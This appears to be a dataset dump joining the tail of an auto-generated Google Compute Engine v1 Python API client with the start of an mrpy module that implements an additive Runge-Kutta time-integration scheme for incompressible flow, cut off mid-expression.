request: (ComputeTargetVpnGatewaysListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetVpnGatewayList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetVpnGateways.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/targetVpnGateways',
request_field='',
request_type_name=u'ComputeTargetVpnGatewaysListRequest',
response_type_name=u'TargetVpnGatewayList',
supports_download=False,
)
class UrlMapsService(base_api.BaseApiService):
"""Service class for the urlMaps resource."""
_NAME = u'urlMaps'
def __init__(self, client):
super(ComputeV1.UrlMapsService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified UrlMap resource.
Args:
request: (ComputeUrlMapsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.urlMaps.delete',
ordered_params=[u'project', u'urlMap'],
path_params=[u'project', u'urlMap'],
query_params=[],
relative_path=u'projects/{project}/global/urlMaps/{urlMap}',
request_field='',
request_type_name=u'ComputeUrlMapsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified UrlMap resource. Get a list of available URL maps by making a list() request.
Args:
request: (ComputeUrlMapsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(UrlMap) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.urlMaps.get',
ordered_params=[u'project', u'urlMap'],
path_params=[u'project', u'urlMap'],
query_params=[],
relative_path=u'projects/{project}/global/urlMaps/{urlMap}',
request_field='',
request_type_name=u'ComputeUrlMapsGetRequest',
response_type_name=u'UrlMap',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a UrlMap resource in the specified project using the data included in the request.
Args:
request: (ComputeUrlMapsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.urlMaps.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/global/urlMaps',
request_field=u'urlMap',
request_type_name=u'ComputeUrlMapsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def InvalidateCache(self, request, global_params=None):
"""Initiates a cache invalidation operation, invalidating the specified path, scoped to the specified UrlMap.
Args:
request: (ComputeUrlMapsInvalidateCacheRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('InvalidateCache')
return self._RunMethod(
config, request, global_params=global_params)
InvalidateCache.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.urlMaps.invalidateCache',
ordered_params=[u'project', u'urlMap'],
path_params=[u'project', u'urlMap'],
query_params=[],
relative_path=u'projects/{project}/global/urlMaps/{urlMap}/invalidateCache',
request_field=u'cacheInvalidationRule',
request_type_name=u'ComputeUrlMapsInvalidateCacheRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of UrlMap resources available to the specified project.
Args:
request: (ComputeUrlMapsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(UrlMapList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.urlMaps.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/urlMaps',
request_field='',
request_type_name=u'ComputeUrlMapsListRequest',
response_type_name=u'UrlMapList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Patches the specified UrlMap resource with the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeUrlMapsPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.urlMaps.patch',
ordered_params=[u'project', u'urlMap'],
path_params=[u'project', u'urlMap'],
query_params=[],
relative_path=u'projects/{project}/global/urlMaps/{urlMap}',
request_field=u'urlMapResource',
request_type_name=u'ComputeUrlMapsPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates the specified UrlMap resource with the data included in the request.
Args:
request: (ComputeUrlMapsUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.urlMaps.update',
ordered_params=[u'project', u'urlMap'],
path_params=[u'project', u'urlMap'],
query_params=[],
relative_path=u'projects/{project}/global/urlMaps/{urlMap}',
request_field=u'urlMapResource',
request_type_name=u'ComputeUrlMapsUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Validate(self, request, global_params=None):
"""Runs static validation for the UrlMap. In particular, the tests of the provided UrlMap will be run. Calling this method does NOT create the UrlMap.
Args:
request: (ComputeUrlMapsValidateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(UrlMapsValidateResponse) The response message.
"""
config = self.GetMethodConfig('Validate')
return self._RunMethod(
config, request, global_params=global_params)
Validate.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.urlMaps.validate',
ordered_params=[u'project', u'urlMap'],
path_params=[u'project', u'urlMap'],
query_params=[],
relative_path=u'projects/{project}/global/urlMaps/{urlMap}/validate',
request_field=u'urlMapsValidateRequest',
request_type_name=u'ComputeUrlMapsValidateRequest',
response_type_name=u'UrlMapsValidateResponse',
supports_download=False,
)
class VpnTunnelsService(base_api.BaseApiService):
"""Service class for the vpnTunnels resource."""
_NAME = u'vpnTunnels'
def __init__(self, client):
super(ComputeV1.VpnTunnelsService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of VPN tunnels.
Args:
request: (ComputeVpnTunnelsAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(VpnTunnelAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.vpnTunnels.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/vpnTunnels',
request_field='',
request_type_name=u'ComputeVpnTunnelsAggregatedListRequest',
response_type_name=u'VpnTunnelAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified VpnTunnel resource.
Args:
request: (ComputeVpnTunnelsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.vpnTunnels.delete',
ordered_params=[u'project', u'region', u'vpnTunnel'],
path_params=[u'project', u'region', u'vpnTunnel'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/vpnTunnels/{vpnTunnel}',
request_field='',
request_type_name=u'ComputeVpnTunnelsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified VpnTunnel resource. Get a list of available VPN tunnels by making a list() request.
Args:
request: (ComputeVpnTunnelsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(VpnTunnel) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.vpnTunnels.get',
ordered_params=[u'project', u'region', u'vpnTunnel'],
path_params=[u'project', u'region', u'vpnTunnel'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/vpnTunnels/{vpnTunnel}',
request_field='',
request_type_name=u'ComputeVpnTunnelsGetRequest',
response_type_name=u'VpnTunnel',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a VpnTunnel resource in the specified project and region using the data included in the request.
Args:
request: (ComputeVpnTunnelsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.vpnTunnels.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/vpnTunnels',
request_field=u'vpnTunnel',
request_type_name=u'ComputeVpnTunnelsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of VpnTunnel resources contained in the specified project and region.
Args:
request: (ComputeVpnTunnelsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(VpnTunnelList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.vpnTunnels.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/vpnTunnels',
request_field='',
request_type_name=u'ComputeVpnTunnelsListRequest',
response_type_name=u'VpnTunnelList',
supports_download=False,
)
class ZoneOperationsService(base_api.BaseApiService):
"""Service class for the zoneOperations resource."""
_NAME = u'zoneOperations'
def __init__(self, client):
super(ComputeV1.ZoneOperationsService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified zone-specific Operations resource.
Args:
request: (ComputeZoneOperationsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ComputeZoneOperationsDeleteResponse) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.zoneOperations.delete',
ordered_params=[u'project', u'zone', u'operation'],
path_params=[u'operation', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/operations/{operation}',
request_field='',
request_type_name=u'ComputeZoneOperationsDeleteRequest',
response_type_name=u'ComputeZoneOperationsDeleteResponse',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Retrieves the specified zone-specific Operations resource.
Args:
request: (ComputeZoneOperationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.zoneOperations.get',
ordered_params=[u'project', u'zone', u'operation'],
path_params=[u'operation', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/operations/{operation}',
request_field='',
request_type_name=u'ComputeZoneOperationsGetRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of Operation resources contained within the specified zone.
Args:
request: (ComputeZoneOperationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(OperationList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.zoneOperations.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/operations',
request_field='',
request_type_name=u'ComputeZoneOperationsListRequest',
response_type_name=u'OperationList',
supports_download=False,
)
class ZonesService(base_api.BaseApiService):
"""Service class for the zones resource."""
_NAME = u'zones'
def __init__(self, client):
super(ComputeV1.ZonesService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
"""Returns the specified Zone resource. Get a list of available zones by making a list() request.
Args:
request: (ComputeZonesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Zone) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.zones.get',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}',
request_field='',
request_type_name=u'ComputeZonesGetRequest',
response_type_name=u'Zone',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of Zone resources available to the specified project.
Args:
request: (ComputeZonesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ZoneList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.zones.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones',
request_field='',
request_type_name=u'ComputeZonesListRequest',
response_type_name=u'ZoneList',
supports_download=False,
)
| 41.384777 | 592 | 0.693722 | 34,355 | 334,389 | 6.574647 | 0.033067 | 0.061362 | 0.048452 | 0.021118 | 0.787061 | 0.777715 | 0.753188 | 0.727585 | 0.716459 | 0.67849 | 0 | 0.000499 | 0.208694 | 334,389 | 8,079 | 593 | 41.3899 | 0.853124 | 0.278391 | 0 | 0.679895 | 1 | 0 | 0.248226 | 0.161006 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067687 | false | 0 | 0.000403 | 0 | 0.137994 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13e72dcf51f4a086648c9a363f270e1aa222a8a0 | 27,947 | py | Python | mrpy/discretization/ARK_ESDIRK3_2I_4L_2_new.py | marc-nguessan/mrpy | 6fb0bce485234a45bb863f71bc2bdf0a22014de3 | [
"BSD-3-Clause"
] | 2 | 2020-01-06T10:48:44.000Z | 2020-01-09T20:07:08.000Z | mrpy/discretization/ARK_ESDIRK3_2I_4L_2_new.py | marc-nguessan/mrpy | 6fb0bce485234a45bb863f71bc2bdf0a22014de3 | [
"BSD-3-Clause"
] | 1 | 2020-01-09T20:08:50.000Z | 2020-01-09T20:11:20.000Z | mrpy/discretization/ARK_ESDIRK3_2I_4L_2_new.py | marc-nguessan/mrpy | 6fb0bce485234a45bb863f71bc2bdf0a22014de3 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import print_function, division
"""The temporal-modules contain the functions needed to comute the advancement in time
of the physical variables simulated. We need a specific temporal scheme to
advance a system of variables. Here, each scheme is implemented in a class. The
class is supposed to be instantiated as a "time-integrator" object in the main
module used to run the simulation. This instance then uses its procedure
attributes to advance the variables defined in the main module. All of the
spatial operations on the variables are devised via the spatial_discretization
operators, so that we have a data abstraction barrier between the procedures
designed here, and the specific data implementation of the discrete variables.
This is done to increase the modularity of this code: as long as we have a valid
spatial_discretization module, we can use this module to advance variables in
time.
Each scheme class inherits from the BaseScheme class. This class is initiated
for now with the veloicty and the pressure, but may change if we need to add
more variables in our simulation. It then processes the following instance
attributes:
- the three main linear spatial operators, divergence, gradient and
laplacian
- the non linear spatial operator for the advection
- a timestep dt
Creating these attributes at the instantiation allows to have them computed once
and for all of the simulation.
The BaseScheme class also has special methods that are generic, such as:
- a solve method that solves a linear system "Ax = b"
- a next-time method that advances the time of the simulation, based on the
current time and the timestep of the class
- a compute-initial-values method that computes the initial values of the
variables over the entire domain
- etc.
If we feel the need for a specific method while designing a new scheme class, we
ask whether other schemes would need this method. If the answer is yes then we
implement this method in the BaseScheme class, so that we only have to modify it
in a single place.
Each scheme class has special methods to implement its specific
time-advancement. The time-advancement is enforced by the method advance, which
each class must possess, but which class-specific. This advance method should
act like a mutator: the variables are implemented as scalars in the main module,
and their local state, which their array of values over every mesh of the
domain, is changed by the call to the advance method.
This module implements the implicit explicit Euler scheme.
"""
import sys, petsc4py
petsc4py.init(sys.argv)
import petsc4py.PETSc as petsc
import mpi4py.MPI as mpi
import numpy as np
import scipy.sparse as sp
from six.moves import range
import importlib
import math
from mrpy.mr_utils import mesh
from mrpy.mr_utils import op
import mrpy.discretization.spatial as sd
from mrpy.discretization.temporal_base import BaseScheme
import mrpy.discretization.ESDIRK3_2I_4L_2_KC as IrkScheme
import mrpy.discretization.ERK_ESDIRK3_2I_4L_2_new as ErkScheme
import config as cfg
class Scheme(BaseScheme):
def __init__(self, dimension=cfg.dimension, tree_velocity_x=None,
tree_velocity_y=None, tree_velocity_z=None, tree_pressure=None,
tree_vorticity=None):
if tree_vorticity is not None:
BaseScheme.__init__(self, tree_velocity_x=tree_velocity_x,
tree_velocity_y=tree_velocity_y,
tree_pressure=tree_pressure, tree_vorticity=tree_vorticity)
else:
BaseScheme.__init__(self, tree_velocity_x=tree_velocity_x,
tree_velocity_y=tree_velocity_y,
tree_pressure=tree_pressure)
self.irk = IrkScheme.Scheme(tree_velocity_x=tree_velocity_x,
tree_velocity_y=tree_velocity_y,
tree_pressure=tree_pressure, tree_vorticity=tree_vorticity)
self.erk = ErkScheme.Scheme(tree_velocity_x=tree_velocity_x,
tree_velocity_y=tree_velocity_y,
tree_pressure=tree_pressure, tree_vorticity=tree_vorticity)
def make_operators(self, tree_velocity_x, tree_velocity_y, tree_pressure,
tree_density=None):
self.make_velocity_mass(tree_velocity_x)
self.make_velocity_inverse_mass(tree_velocity_x)
if self.low_mach:
self.make_one_over_density(tree_density)
self.make_velocity_div_x(tree_velocity_x)
self.make_velocity_div_y(tree_velocity_y)
self.make_velocity_adv_x(tree_velocity_x, tree_velocity_y)
self.make_velocity_adv_y(tree_velocity_x, tree_velocity_y)
self.make_velocity_lap_x(tree_velocity_x)
self.make_velocity_lap_y(tree_velocity_y)
self.make_pressure_grad_x(tree_pressure)
self.make_pressure_grad_y(tree_pressure)
self.make_velocity_adv_x(tree_velocity_x, tree_velocity_y)
self.make_velocity_adv_y(tree_velocity_x, tree_velocity_y)
self.make_pressure_divgrad()
self.irk.make_operators(tree_velocity_x, tree_velocity_y, tree_pressure)
self.erk.make_operators(tree_velocity_x, tree_velocity_y, tree_pressure)
def make_ksps(self):
self.irk.make_ksps()
self.erk.make_ksps()
def advance(self, v_x=None, v_y=None, v_z=None, p=None, t_ini=0, nsp=None):
st_rhs_12 = None
st_rhs_13 = None
st_rhs_14 = None
st_rhs_22 = None
st_rhs_23 = None
st_rhs_24 = None
st_rhs_32 = None
st_rhs_33 = None
st_rhs_34 = None
if self.uniform: #v_x, v_y, etc are scalars, and we just advance them
if self.st_flag_vx:
mesh.listing_of_leaves(self.st_tree_vx)
self.compute_source_term(self.st_tree_vx, self.st_func_vx,
t_ini + self.irk.C_coefs["c2"]*self.dt)
#mesh.listing_of_leaves(self.st_tree_vx)
st_rhs_12 = sd.Scalar(self.st_tree_vx)
self.compute_source_term(self.st_tree_vx, self.st_func_vx,
t_ini + self.irk.C_coefs["c3"]*self.dt)
#mesh.listing_of_leaves(self.st_tree_vx)
st_rhs_13 = sd.Scalar(self.st_tree_vx)
self.compute_source_term(self.st_tree_vx, self.st_func_vx,
t_ini + self.irk.C_coefs["c4"]*self.dt)
#mesh.listing_of_leaves(self.st_tree_vx)
st_rhs_14 = sd.Scalar(self.st_tree_vx)
if self.st_flag_vy:
mesh.listing_of_leaves(self.st_tree_vy)
self.compute_source_term(self.st_tree_vy, self.st_func_vy,
t_ini + self.irk.C_coefs["c2"]*self.dt)
#mesh.listing_of_leaves(self.st_tree_vy)
st_rhs_22 = sd.Scalar(self.st_tree_vy)
self.compute_source_term(self.st_tree_vy, self.st_func_vy,
t_ini + self.irk.C_coefs["c3"]*self.dt)
#mesh.listing_of_leaves(self.st_tree_vy)
st_rhs_23 = sd.Scalar(self.st_tree_vy)
self.compute_source_term(self.st_tree_vy, self.st_func_vy,
t_ini + self.irk.C_coefs["c4"]*self.dt)
#mesh.listing_of_leaves(self.st_tree_vy)
st_rhs_24 = sd.Scalar(self.st_tree_vy)
if self.st_flag_vc:
mesh.listing_of_leaves(self.st_tree_vc)
self.compute_source_term(self.st_tree_vc, self.st_func_vc,
t_ini + self.irk.C_coefs["c2"]*self.dt)
#mesh.listing_of_leaves(self.st_tree_vc)
st_rhs_32 = sd.Scalar(self.st_tree_vc)
self.compute_source_term(self.st_tree_vc, self.st_func_vc,
t_ini + self.irk.C_coefs["c3"]*self.dt)
#mesh.listing_of_leaves(self.st_tree_vc)
st_rhs_33 = sd.Scalar(self.st_tree_vc)
self.compute_source_term(self.st_tree_vc, self.st_func_vc,
t_ini + self.irk.C_coefs["c4"]*self.dt)
#mesh.listing_of_leaves(self.st_tree_vc)
st_rhs_34 = sd.Scalar(self.st_tree_vc)
g_11, g_21, g_31 = sd.Scalar(), sd.Scalar(), sd.Scalar()
g_11.sc, g_21.sc, g_31.sc = v_x.sc.copy(), v_y.sc.copy(), p.sc.copy()
print("stage 1 done")
print("")
g_12, g_22, g_32 = sd.Scalar(), sd.Scalar(), sd.Scalar()
g_12.sc, g_22.sc, g_32.sc = g_11.sc.copy(), g_21.sc.copy(), g_31.sc.copy()
rhs_momentum_x = sd.add_scalars(
sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(v_x)),
sd.mul_num_scalar(self.erk.A_coefs["a21"],
self.erk.make_rhs_ode_x(g_11, g_21)),
sd.mul_num_scalar(self.irk.A_coefs["a21"], self.irk.make_rhs_dae_x(g_11,
g_31, st_rhs_12)))
rhs_momentum_y = sd.add_scalars(
sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(v_y)),
sd.mul_num_scalar(self.erk.A_coefs["a21"],
self.erk.make_rhs_ode_y(g_11, g_21)),
sd.mul_num_scalar(self.irk.A_coefs["a21"], self.irk.make_rhs_dae_y(g_21,
g_31, st_rhs_22)))
self.irk.uzawa_solver_internal("2", velocity_x=g_12, velocity_y=g_22,
pressure=g_32, rhs_momentum_x=rhs_momentum_x,
rhs_momentum_y=rhs_momentum_y, rhs_continuity=st_rhs_32)
print("stage 2 done")
print("")
g_13, g_23, g_33 = sd.Scalar(), sd.Scalar(), sd.Scalar()
g_13.sc, g_23.sc, g_33.sc = g_12.sc.copy(), g_22.sc.copy(), g_32.sc.copy()
rhs_momentum_x = sd.add_scalars(
sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(v_x)),
sd.mul_num_scalar(self.erk.A_coefs["a31"],
self.erk.make_rhs_ode_x(g_11, g_21)),
sd.mul_num_scalar(self.erk.A_coefs["a32"],
self.erk.make_rhs_ode_x(g_12, g_22)),
sd.mul_num_scalar(self.irk.A_coefs["a31"], self.irk.make_rhs_dae_x(g_11,
g_31, st_rhs_13)),
sd.mul_num_scalar(self.irk.A_coefs["a32"], self.irk.make_rhs_dae_x(g_12,
g_32, st_rhs_13)))
rhs_momentum_y = sd.add_scalars(
sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(v_y)),
sd.mul_num_scalar(self.erk.A_coefs["a31"],
self.erk.make_rhs_ode_y(g_11, g_21)),
sd.mul_num_scalar(self.erk.A_coefs["a32"],
self.erk.make_rhs_ode_y(g_12, g_22)),
sd.mul_num_scalar(self.irk.A_coefs["a31"], self.irk.make_rhs_dae_y(g_21,
g_31, st_rhs_23)),
sd.mul_num_scalar(self.irk.A_coefs["a32"], self.irk.make_rhs_dae_y(g_22,
g_32, st_rhs_23)))
self.irk.uzawa_solver_internal("3", velocity_x=g_13, velocity_y=g_23,
pressure=g_33, rhs_momentum_x=rhs_momentum_x,
rhs_momentum_y=rhs_momentum_y, rhs_continuity=st_rhs_33)
print("stage 3 done")
print("")
#quit()
g_14, g_24, g_34 = sd.Scalar(), sd.Scalar(), sd.Scalar()
g_14.sc, g_24.sc, g_34.sc = g_13.sc.copy(), g_23.sc.copy(), g_33.sc.copy()
rhs_momentum_x = sd.add_scalars(
sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(v_x)),
sd.mul_num_scalar(self.erk.A_coefs["a41"],
self.erk.make_rhs_ode_x(g_11, g_21)),
sd.mul_num_scalar(self.erk.A_coefs["a42"],
self.erk.make_rhs_ode_x(g_12, g_22)),
sd.mul_num_scalar(self.erk.A_coefs["a43"],
self.erk.make_rhs_ode_x(g_13, g_23)),
sd.mul_num_scalar(self.irk.A_coefs["a41"], self.irk.make_rhs_dae_x(g_11,
g_31, st_rhs_14)),
sd.mul_num_scalar(self.irk.A_coefs["a42"], self.irk.make_rhs_dae_x(g_12,
g_32, st_rhs_14)),
sd.mul_num_scalar(self.irk.A_coefs["a43"], self.irk.make_rhs_dae_x(g_13,
g_33, st_rhs_14)))
rhs_momentum_y = sd.add_scalars(
sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(v_y)),
sd.mul_num_scalar(self.erk.A_coefs["a41"],
self.erk.make_rhs_ode_y(g_11, g_21)),
sd.mul_num_scalar(self.erk.A_coefs["a42"],
self.erk.make_rhs_ode_y(g_12, g_22)),
sd.mul_num_scalar(self.erk.A_coefs["a43"],
self.erk.make_rhs_ode_y(g_13, g_23)),
sd.mul_num_scalar(self.irk.A_coefs["a41"], self.irk.make_rhs_dae_y(g_21,
g_31, st_rhs_24)),
sd.mul_num_scalar(self.irk.A_coefs["a42"], self.irk.make_rhs_dae_y(g_22,
g_32, st_rhs_24)),
sd.mul_num_scalar(self.irk.A_coefs["a43"], self.irk.make_rhs_dae_y(g_23,
g_33, st_rhs_24)))
self.irk.uzawa_solver_internal("4", velocity_x=g_14, velocity_y=g_24,
pressure=g_34, rhs_momentum_x=rhs_momentum_x,
rhs_momentum_y=rhs_momentum_y, rhs_continuity=st_rhs_34)
print("stage 4 done")
print("")
#g_1f, g_2f, g_3f = sd.Scalar(), sd.Scalar(), sd.Scalar()
#g_1f.sc, g_2f.sc, g_3f.sc = g_14.sc.copy(), g_24.sc.copy(), g_34.sc.copy()
#rhs_momentum_x = sd.add_scalars(
# sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(v_x)),
# sd.mul_num_scalar(self.erk.B_coefs["b1"],
# self.erk.make_rhs_ode_x(g_11, g_21)),
# sd.mul_num_scalar(self.erk.B_coefs["b2"],
# self.erk.make_rhs_ode_x(g_12, g_22)),
# sd.mul_num_scalar(self.erk.B_coefs["b3"],
# self.erk.make_rhs_ode_x(g_13, g_23)),
# sd.mul_num_scalar(self.erk.B_coefs["b4"],
# self.erk.make_rhs_ode_x(g_14, g_24)),
# sd.mul_num_scalar(self.irk.A_coefs["a41"], self.irk.make_rhs_dae_x(g_11,
# g_31, st_rhs_14)),
# sd.mul_num_scalar(self.irk.A_coefs["a42"], self.irk.make_rhs_dae_x(g_12,
# g_32, st_rhs_14)),
# sd.mul_num_scalar(self.irk.A_coefs["a43"], self.irk.make_rhs_dae_x(g_13,
# g_33, st_rhs_14)))
#rhs_momentum_y = sd.add_scalars(
# sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(v_y)),
# sd.mul_num_scalar(self.erk.B_coefs["b1"],
# self.erk.make_rhs_ode_y(g_11, g_21)),
# sd.mul_num_scalar(self.erk.B_coefs["b2"],
# self.erk.make_rhs_ode_y(g_12, g_22)),
# sd.mul_num_scalar(self.erk.B_coefs["b3"],
# self.erk.make_rhs_ode_y(g_13, g_23)),
# sd.mul_num_scalar(self.erk.B_coefs["b4"],
# self.erk.make_rhs_ode_y(g_14, g_24)),
# sd.mul_num_scalar(self.irk.A_coefs["a41"], self.irk.make_rhs_dae_y(g_21,
# g_31, st_rhs_24)),
# sd.mul_num_scalar(self.irk.A_coefs["a42"], self.irk.make_rhs_dae_y(g_22,
# g_32, st_rhs_24)),
# sd.mul_num_scalar(self.irk.A_coefs["a43"], self.irk.make_rhs_dae_y(g_23,
# g_33, st_rhs_24)))
#self.irk.uzawa_solver_internal("4", velocity_x=g_1f, velocity_y=g_2f,
# pressure=g_3f, rhs_momentum_x=rhs_momentum_x,
# rhs_momentum_y=rhs_momentum_y, rhs_continuity=st_rhs_34)
#print("final stage done")
#print("")
g_1f, g_2f, g_3f = sd.Scalar(), sd.Scalar(), sd.Scalar()
#g_1f.sc, g_2f.sc, g_3f.sc = g_14.sc.copy(), g_24.sc.copy(), g_34.sc.copy()
g_1f = sd.add_scalars(
v_x,
self.velocity_inverse_mass.apply(
sd.mul_num_scalar(self.dt, sd.add_scalars(
